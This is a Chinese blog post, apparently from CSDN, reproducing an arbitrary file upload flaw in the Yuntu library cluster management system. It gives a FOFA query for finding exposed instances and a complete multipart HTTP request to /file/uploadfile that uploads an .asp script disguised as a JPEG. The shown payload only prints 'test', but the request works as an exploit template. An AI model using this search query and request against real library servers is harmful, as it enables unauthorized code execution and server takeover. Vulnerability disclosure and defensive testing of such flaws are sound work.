【漏洞复现】云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞

已于 2024-03-26 23:09:56 修改
阅读量264 收藏
点赞数 8
文章标签: web安全 网络安全
于 2024-03-26 23:05:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137060944
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。

二、影响版本

云图图书馆集群管理系统

三、资产测绘

fofa:body=“Login/scanwxusr”

image-20240326230247394

四、漏洞复现

POST /file/uploadfile HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=00content0boundary00
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 176

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="vezvf.asp"
Content-Type: image/jpeg

<%Response.Write("test")%>
--00content0boundary00--

image-20240326225945315

image-20240326230143287

E_cho234
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
stl文件读取_matlab读取stl文件形成点云_读取stl文件_读取stl_形貌_形貌扫描云图_
10-03
用于三维光学形貌扫描完成后,生成的stl文件的读取,并形成俯视投影云图
气象云图数据解析代码之Java实现
04-14
Java语言实现解析气象云图数据,获得良好的效果,能够实现对AWX格式的气象云图数据精准解析,测试效果良好!
漏洞复现】广州图创图书馆集群管理系统任意文件读取漏洞
晚风不及你
01-17 795
广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。
漏洞复现云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(3)
2401_84972726的博客
05-13 351
云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
漏洞复现云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(2)
2401_84972703的博客
05-13 308
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
漏洞复现云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(4)
2401_84972745的博客
05-13 112
云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。
漏洞复现云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(1)
2401_84972676的博客
05-13 155
云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。
无盘服务器文件管理,云图管家文档图纸管理软件
weixin_30247833的博客
07-31 282
云图管家是一款企业级图纸文档内控安全管理的软件。软件专业的特色功能丰富,适用范围广泛,采用的创新型的“虚拟无盘”磁盘沙盒安全技术,实现客户端文件保存重新定向,本地不保存文件而强制直接保存到服务器;可以强制选择性的规定需要管理的文件类型(如 Word 、PDF、图片、AutoCAD、Solidworks、Pro/E 、UG等二维三维图纸文件),并且只能保存在服务器,从而确保了电子图档自动强制集中管理...
python中wordcloud函数不同形状云图_10行Python代码生成任意形状的文字云图
weixin_42101720的博客
01-14 435
来源:王飞,小编有所改动先看一下效果吧,小编随意从网上找了两篇文章,关于爱情的一篇文章用的心形,关于母爱的一篇文章用的热气球形。是否感叹到这种文字云图之美?那么,就赶快动手生成自己所写的文字的云图吧。安装、导入模块文字云需要用到两个模块,分别是:jieba 和wordcloud,一般安装方法 pip install jieba/wordcloud 会报错,无法安装,不知道你的运气如何?解决方法是...
云图说丨OLAP开源引擎的一匹黑马,MRS集群组件之ClickHouse
华为云官方博客
07-14 816
ClickHouse是俄罗斯公司 Yandex 在2016年开源的高性能、开源联机分析列式数据库管理系统。开源后,凭借卓越的分析性能、极好的线性扩展能力和丰富的功能,被业界公认为实时分析领域 OLAP 开源引擎的一匹黑马。...
Fluent的小bug处理:后处理截面显示存在漏洞
驭风之道
02-02 549
最近发现的Fluent的bug,关于后处理截面显示不完整的问题。
云合2.0发布——阿里云生态云图.pdf
08-21
云合2 安全应急 隐私合规 态势感知 安全运营 安全架构
基于matlab的任意边界云图的动画制作
05-07
利用ppt进行汇报时,如果能把一些云图的动画放在PPT里面效果会非常好。...本代码功能在于可针对矩形区域内任意外形边界,进行任意数据的云图绘制,并保存为avi视频文件,可非常方便放在PPT里面,展示效果非常好!
NOAA气象云图接收SDR软件-2016级国科大电子系统设计课程作业项目.zip
11-17
大学生课程设计毕业设计项目、系统开发,供计算机等专业同学参考,提供说明材料+源代码 大学生课程设计毕业设计项目、系统开发,供计算机等专业同学参考,提供说明材料+源代码 大学生课程设计毕业设计项目、系统开发...
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
2301_80961833的博客
05-20 687
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
CTF网络安全大赛简单web题目:eval
Pythonit教程网
05-17 901
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
出海战略中的网络技术应用:SOCKS5代理、代理IP与网络安全
最新发布
Together_GPT的博客
05-22 356
在全球市场中,SOCKS5代理、代理IP以及全面的网络安全措施,是跨界电商和游戏行业企业实现成功出海的关键技术支柱。通过结合使用加密技术,如SSL/TLS,SOCKS5代理能够为数据传输提供一个安全的隧道,进一步增强数据的保密性和完整性。游戏企业则可以减少游戏延迟,提升玩家的游戏体验。同时,企业还可以根据不同地区的文化和语言特点,定制化地推送内容,提升用户的参与度和满意度。利用SOCKS5代理和代理IP,虽然可以在一定程度上增强安全性和隐私保护,但还需要更多的措施来构建全面的网络安全体系。
e3c 点云图 文件格式
07-24
### 回答1: E3C 点云图文件格式是一种用于存储和处理点云数据的文件格式。点云数据是指由大量离散点组成的三维空间数据,它广泛应用于计算机视觉、机器人、虚拟现实等领域。 E3C 点云图文件格式提供了一种标准的存储和交换点云数据的方式,使得不同的软件和设备可以方便地读取和处理这些数据。它采用了一种基于文本的格式,可以使用文本编辑器进行查看和编辑。 E3C 点云图文件格式将点云数据存储为一系列点的坐标和属性信息。每个点的坐标由三个浮点数表示,分别代表点在三维空间中的位置。此外,每个点还可以包含其他属性信息,如颜色、法线方向、强度等。 除了点的坐标和属性信息,E3C 点云图文件格式还包含了一些辅助信息,如点云的边界框、文件版本号等。这些信息有助于软件和设备在读取和处理点云数据时进行正确的解析和操作。 使用E3C 点云图文件格式,我们可以方便地将点云数据保存为文件,并在需要时进行读取和处理。该文件格式的开放性和通用性使得它成为点云数据存储和交换的常用标准,有助于促进不同软件和设备之间的互通性。 ### 回答2: E3C点云图文件格式是一种用于存储和表示点云数据的文件格式。点云是由大量的三维点组成的数据集,每个点都有自己的坐标和可能的其他属性信息。 E3C点云图文件格式采用二进制方式存储数据,以节省存储空间和提高读写效率。该格式包含了一系列的数据块,每个数据块包含了点云数据的不同部分。常见的数据块包括点坐标数据块、颜色数据块、法线数据块等。 点坐标数据块存储了点的三维坐标信息。每个点都有X、Y和Z坐标分量,以浮点数的形式存储。颜色数据块存储了点的颜色信息,一般用RGB三个分量表示。法线数据块存储了点的法线向量信息,用于描述点云表面的朝向。此外,还可以包含其他的属性信息,如点的强度、分类等。 E3C点云图文件格式还提供了索引和压缩功能。索引可以加速点的查找和访问,而压缩则可以减小文件的大小。压缩的方式可以采用无损压缩或有损压缩,根据用户的需求和应用场景选择合适的压缩算法。 使用E3C点云图文件格式可以有效地存储和传输大量的三维点云数据,方便点云数据的处理和分析。该格式在机器视觉、三维重建、自动驾驶等领域广泛应用,为各种点云相关的应用提供了便利。 ### 回答3: E3C点云图文件格式是一种用于存储和处理点云数据的文件格式。点云是由大量的3D点组成的,它们可以表示物体表面在三维空间中的形状和位置。 E3C点云图文件格式通常使用二进制形式存储数据,以便有效地表示大量的点。这种格式具有一定的压缩能力,可以减小文件的大小,并提高数据的传输和存储效率。 E3C点云图文件格式通常包括点的坐标信息、法线信息、颜色信息等。坐标信息描述了点在三维空间中的位置,法线信息描述了点在表面上的方向,而颜色信息描述了点的颜色。 E3C点云图文件格式还可以包含其他辅助信息,比如点的分类、标签、注释等。这些额外的信息可以帮助用户对点云数据进行更详细的分析和处理。 为了方便点云数据的使用,E3C点云图文件格式还定义了一些标准的读取和写入接口,以便软件程序能够直接读取和处理这种格式的数据。这使得点云数据在各种不同的应用领域中得到了广泛的应用,比如计算机视觉、虚拟现实、机器人技术等。 总的来说,E3C点云图文件格式是一种用于存储和处理点云数据的方便、高效的文件格式。它为点云数据的分析和应用提供了强大的支持,对于推动相关领域的发展具有重要的意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值